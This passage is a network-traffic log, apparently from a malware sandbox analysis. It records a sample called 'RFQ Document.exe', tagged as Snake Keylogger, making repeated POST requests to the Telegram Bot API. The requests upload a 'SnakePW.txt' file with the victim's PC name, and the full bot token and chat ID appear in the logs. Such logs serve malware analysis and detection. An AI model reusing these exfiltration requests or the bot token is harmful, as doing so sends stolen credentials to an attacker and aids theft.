{"ok":true,"result":{"message_id":12840,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
253	192.168.2.4	50082	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:39 UTC	402	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f0cfe7e3 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:39 UTC	403	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 63 66 65 37 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f0cfe7e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:39 UTC	403	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:39 UTC	403	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12841,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
254	192.168.2.4	50084	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:39 UTC	404	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f0f60d43 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:39 UTC	404	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 66 36 30 64 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f0f60d43Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:39 UTC	405	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:39 UTC	405	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12842,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808779,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
255	192.168.2.4	50087	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:40 UTC	405	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f11c3109 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:40 UTC	406	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 31 63 33 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f11c3109Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:40 UTC	406	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:40 UTC	407	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12843,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
256	192.168.2.4	50089	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:40 UTC	407	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f1425682 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:40 UTC	407	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 34 32 35 36 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f1425682Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:40 UTC	408	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:40 UTC	408	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12844,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
257	192.168.2.4	50091	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:40 UTC	409	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f1615788 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:40 UTC	409	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 36 31 35 37 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f1615788Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:40 UTC	409	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:40 UTC	410	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12845,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
258	192.168.2.4	50093	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:40 UTC	410	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f180548b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:40 UTC	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 38 30 35 34 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f180548bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:40 UTC	411	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:40 UTC	411	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12846,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
259	192.168.2.4	50094	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:40 UTC	412	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f195cb65 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:40 UTC	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 39 35 63 62 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f195cb65Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:41 UTC	413	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:41 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:41 UTC	413	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12847,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49800	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:25 UTC	41	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c500bbdf Host: api.telegram.org Content-Length: 407
